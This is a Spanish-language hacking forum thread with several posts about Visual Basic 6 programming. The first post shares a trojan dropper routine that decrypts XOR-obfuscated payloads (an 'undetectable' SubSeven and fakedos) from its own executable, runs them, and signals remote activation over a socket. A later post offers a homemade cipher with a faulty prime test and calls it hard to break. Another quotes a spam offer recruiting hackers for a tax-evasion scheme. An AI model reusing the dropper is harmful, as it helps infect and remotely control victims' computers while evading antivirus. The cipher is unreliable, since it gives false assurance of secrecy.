Mensajes

Espero q les sirva, lo uso siempre en mi troyano. Para agregarle un subseven indetectable y un fakedos indetectable, si alguien lo puede mejorar, estaria muy agradecido.

Código [Seleccionar] Expandir

Public Sub UnpANDDec(trojan As Integer)
dump = 196608 'tamaño del troyano compilado
Open ".\" & App.EXEName & ".exe" For Binary As #1
Dim writeQ As Boolean
Open ".\" & "juegos.exe" For Output As #2
Close #2
Open ".\" & "juegos.exe" For Binary As #2
Do
DoEvents
Get #1, , chara
If trojan = 0 Then
If Loc(1) = dump + 1 Then
writeQ = True
End If
Else
If Loc(1) = dump + 351788 + 1 Then
writeQ = True
End If
End If
If writeQ = True Then
chara = Chr((Asc(chara) Xor 4))
Put #2, , chara
End If
If trojan = 0 Then
If Loc(1) = 351788 + dump Then
writeQ = False
End If
Else
If Loc(1) = 351788 + 372131 + dump Then
writeQ = False
End If
End If
If Loc(1) = LOF(1) Then
Exit Do
End If
Loop
Close
Close
Dim rerts
retrs = Shell(".\juegos.exe")
Code.ws(Code.ports).SendData "TROJAN ACTIVATED" & vbCrLf
Call Reset
End Sub


cifra los archivos con un simple xor 4 para q no sean detectados, y al infectar una pc con el troyano, se puede activar remotamente. Lo descifra y lo ejecuta. Suert

no conozco el .net, usa el q mejor t venga.

Rojodos se va?. Que mal, la verdad me pone muy triste ya q con el aprendi lo q es un exploit  .

usa otro proceso para monitorear al general e incluso 2 procesos.

Instalate el visual basic, inclui un control richtextbox y pone

Código [Seleccionar] Expandir

richtextbox1. ' no te olvides del punto

Y ahi t van a aparecer todas las opciones, usa msdn, experimenta, proba, no esperes q te den todas las respuestas. No estoy seguro d q sea .net esto, pero puedo estar equivocado. Suert

Si vos lo abris con tu propio programa eso es posible:

Código [Seleccionar] Expandir

Private Declare Function OpenProcess Lib "kernel32" Alias "OpenProcess" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long

Private Declare Function GetExitCodeProcess Lib "kernel32" Alias "GetExitCodeProcess" (ByVal hProcess As Long, lpExitCode As Long) As Long

Private Const STILL_ACTIVE = &H103
Private Const PROCESS_QUERY_INFORMATION = &H400

Sub Ejecutar(Aplicacion As String)
Dim hProceso As long
Dim Activa As Long

hProceso = OpenProcess(PROCESS_QUERY_INFORMATION, 0, Shell(Aplicacion, 1))

Do
ret = GetExitCodeProcess(hProceso, Activa)
DoEvents
Loop While Activa = STILL_ACTIVE

'Una vez que se termino la ejecucion...

End sub


Fuente: Microsoft Visual Basic 6.0 Manual de referencia. USERS

Si tenes la handle del proceso tambien podes usar el GetExitCodeProcess.

Suert y espero q t sirva.

Xq no pides una contraseña y cifras la contraseña haciendola muy larga. Una posibilidad es esta:

Código [Seleccionar] Expandir


Private Sub Form_Load()
Dim contraseña As String
contraseña = "TUMAMI"
Dim i As Double
Dim precifrada$
Dim cifrada$
Dim bufchr$
For i = 1 To Len(contraseña)
DoEvents
bufchr = Mid(contraseña, i, 1)
precifrada = precifrada & Chr(Int(Rnd * 25 + 65)) & ((Asc(bufchr)) ^ 2 ^ 2) * 61
Next i
For i = 1 To Len(precifrada)
If isprimo(i) Then
cifrada = cifrada & Chr(Asc(Mid(precifrada, i, 1)) Xor 61)
Else
cifrada = cifrada & Mid(precifrada, i, 1)
End If
Next i
'ak tenes q cifrar lo q quieras con la contraseña de muuuchos bits
End Sub

Function isprimo(numero As Double) As Boolean
Dim i As Double
Dim salida As Boolean
salida = False
For i = 2 To numero
DoEvents
If Int(numero / i) - numero = 1 Then
salida = True
End If
Next i
If numero = 1 Then
isprimo = True
Else
isprimo = salida
End If
End Function


No sera gran cosa, pero le va a ser bastante dificil a alguien adivinar el cifrado.  Jeje, sobretodo con lo de los numeros primos. Para descifrar hagan el proceso al revez. Es reversible. Lo akbo d hacer es bastante simple. Pero supongo q el fbi lo descubriría jeje.

Ak dejo uno mas, recien salidito del horno:

estimados amigos:me presento como trabajo facil y eso es exactamente lo que ofrezco,busco hackers que quieran trabajar desde casa con su pc,el objetivo es la captacion de nuevos clientes y empresas para ofrecerles el no pago de impuestos,increible verdad?los ingresos son realmente altos...si estais interesados contactarme en esta direccion y os explicare con mas detalle.gracias    XXXXXXXX@hotmail.com

Te recomiendo q uses otro servidor smtp.
mail.hotmail.com
o busca en www.google.com

Brujo, estamos esperando tu respuesta.